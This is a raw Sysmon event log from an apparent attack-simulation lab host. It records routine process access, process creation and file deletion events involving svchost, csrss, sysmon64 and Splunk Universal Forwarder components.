07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808290Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808289Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808288Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808287Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808286Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808285Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808284Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808283Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F5A8-60EB-9079-00000000D001}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808282Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5A8-60EB-9079-00000000D001}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808281Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.847{0C1E0330-F5A8-60EB-9079-00000000D001}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808280Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.612{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1200A32A9A5A0875414D4D20A0CC86DC,SHA256=C6880F28AF8EA12842F6AA910C01153E4E2C54F7D6F440488233C89C6CD4A96A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808279Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.472{0C1E0330-F5A8-60EB-8F79-00000000D001}23723580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808278Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.315{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5A8-60EB-8F79-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808277Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.315{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808276Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.315{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808275Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.299{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808274Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.299{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808273Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.299{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808272Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.299{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808271Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.299{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808270Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.299{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808269Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.299{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808268Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.299{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F5A8-60EB-8F79-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808267Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.299{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5A8-60EB-8F79-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808266Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.300{0C1E0330-F5A8-60EB-8F79-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000808310Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.721{0C1E0330-F5A9-60EB-9179-00000000D001}9002768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000808309Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.643{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 